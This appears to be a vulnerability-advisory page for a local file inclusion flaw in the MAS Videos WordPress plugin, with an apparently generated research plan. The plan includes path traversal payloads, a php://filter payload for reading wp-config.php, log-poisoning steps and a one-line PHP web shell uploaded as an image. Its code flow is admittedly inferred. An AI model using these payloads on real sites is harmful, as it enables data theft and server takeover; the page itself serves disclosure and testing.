MAS Videos <= 1.3.2 - Authenticated (Contributor+) Local File Inclusion
Description
The MAS Videos plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 1.3.2. This makes it possible for authenticated attackers, with contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other "safe" file types can be uploaded and included.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:HTechnical Details
<=1.3.2This research plan targets **CVE-2025-62753**, a Local File Inclusion (LFI) vulnerability in the **MAS Videos** plugin for WordPress. ## 1. Vulnerability Summary The **MAS Videos** plugin (versions <= 1.3.2) fails to properly validate or sanitize file paths provided by users before passing them to …
Show full research plan
This research plan targets CVE-2025-62753, a Local File Inclusion (LFI) vulnerability in the MAS Videos plugin for WordPress.
1. Vulnerability Summary
The MAS Videos plugin (versions <= 1.3.2) fails to properly validate or sanitize file paths provided by users before passing them to PHP include or require statements. This vulnerability allows authenticated users with Contributor level permissions or higher to traverse directories and include arbitrary files from the server.
If the included file contains PHP code (e.g., a malicious image upload or a system log), it will be executed. Even without code execution, sensitive files like /etc/passwd or wp-config.php (if the environment allows) can potentially be processed, leading to information disclosure.
2. Attack Vector Analysis
- User Role: Authenticated (Contributor or higher).
- Vulnerable Endpoint: Most likely a Shortcode callback or an AJAX action available to authenticated users.
- Vulnerable Parameter: Likely a parameter named
template,style,path, orfile. - Payload Mechanism: Path traversal sequences (
../../) used to escape the intended directory.
3. Code Flow (Inferred)
Based on common LFI patterns in video/e-commerce plugins:
- A Contributor user creates a post and inserts a shortcode (e.g.,
[masvideos_template path="..."]). - The shortcode callback function (likely in
includes/class-masvideos-shortcodes.phpor similar) retrieves thepathattribute. - The plugin calls a template loading function like
masvideos_get_template()orwc_get_template()(if based on WooCommerce). - Inside that function, the input is concatenated to a base directory:
$file = MASVIDEOS_PLUGIN_DIR . 'templates/' . $user_input . '.php';. - The code executes
include( $file );without validating that$user_inputstays within thetemplates/directory.
4. Nonce Acquisition Strategy
If the vulnerability is triggered via a shortcode, no nonce is typically required beyond the standard WordPress session. If it is triggered via AJAX:
- Identify Action: Search for
wp_ajax_registrations in the plugin:grep -rn "wp_ajax_" wp-content/plugins/masvideos/ - Identify Nonce Key: Look for
wp_create_nonceorcheck_ajax_refererin the identified handler. - Localize Script: Identify where the nonce is sent to the frontend (usually via
wp_localize_script).grep -rn "wp_localize_script" wp-content/plugins/masvideos/ - Extract via Browser:
- Create a post with the relevant shortcode to ensure the script is loaded.
wp post create --post_type=post --post_status=publish --post_author=[CONTRIBUTOR_ID] --post_content='[masvideos_shortcode_here]'- Navigate to the post URL.
- Use
browser_eval("window.masvideos_vars?.nonce")(replacemasvideos_varsandnoncewith actual keys found in the source).
5. Exploitation Strategy
We will attempt to include /etc/passwd to confirm LFI.
- Login as Contributor: Authenticate and obtain session cookies.
- Identify Shortcode: Search for shortcodes in the plugin:
grep -rn "add_shortcode" wp-content/plugins/masvideos/
(Assume a hypothetical shortcode[masvideos_video]with atemplateattribute). - Craft Payload:
[masvideos_video template="../../../../../../../../../../../etc/passwd"]
Note: If the code appends.php, we may need to test if the environment is susceptible to null byte injection (unlikely in modern PHP) or if there's a way to include an existing file without the extension. - Submit Request:
- Use
http_requestto create a "Pending Review" post containing the payload. - Use
http_requestto "Preview" the post.
- Use
- Target URL:
http://localhost:8080/wp-admin/post-new.phporadmin-ajax.php.
6. Test Data Setup
- Create Contributor:
wp user create attacker attacker@example.com --role=contributor --user_pass=password - Enable Plugin:
wp plugin activate masvideos - Identify Target File: Ensure
/etc/passwdis readable in the test environment.
7. Expected Results
- The HTTP response for the post preview should contain the contents of
/etc/passwd(e.g., lines starting withroot:x:0:0:). - If the plugin appends
.php, the response might be a "File not found" or a PHP error showing the full path, confirming the traversal:include(/var/www/html/wp-content/plugins/masvideos/templates/../../../../etc/passwd.php).
8. Verification Steps
- Check Logs: Use
wp-clito check the error log if the exploit fails to render output:tail -n 50 /var/www/html/wp-content/debug.log - Source Code Confirmation: Once access is gained, verify the sink:
grep -rnE "include|require" wp-content/plugins/masvideos/ | grep "\$"
Confirm if the variables in these calls are sourced fromshortcode_attsor$_REQUEST.
9. Alternative Approaches
- Null Byte Injection: If on a very old PHP version, try
template=../../etc/passwd%00. - Wrapper Exploitation: Try PHP filters to read
wp-config.phpsource:template=php://filter/convert.base64-encode/resource=../../../../../wp-config.php - RCE via Log Poisoning: If the LFI is confirmed, attempt to include
/var/log/apache2/access.logor/var/log/nginx/access.logafter injecting PHP code into the User-Agent header. - RCE via Upload: If the plugin allows Contributors to upload video thumbnails, upload a file named
shell.jpgcontaining<?php system($_GET['cmd']); ?>, then include it viatemplate=../../uploads/masvideos/shell.jpg.
Summary
The MAS Videos plugin for WordPress (versions up to 1.3.2) contains a Local File Inclusion (LFI) vulnerability that allows authenticated users with Contributor-level permissions or higher to include and execute arbitrary PHP files. This occurs due to inadequate validation of user-provided paths before they are used in file inclusion statements.
Exploit Outline
1. Authenticate to the WordPress site as a user with Contributor or higher privileges. 2. Locate a functional component (such as a shortcode or AJAX handler) that accepts a template or file path parameter (e.g., the 'template' attribute in a video-related shortcode). 3. Inject path traversal sequences (e.g., '../../../../etc/passwd') into the identified parameter to attempt to access files outside the intended directory. 4. To achieve remote code execution, an attacker might include a previously uploaded 'safe' file (like an image) that contains embedded PHP code, or leverage log poisoning techniques to include a system log containing PHP syntax.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.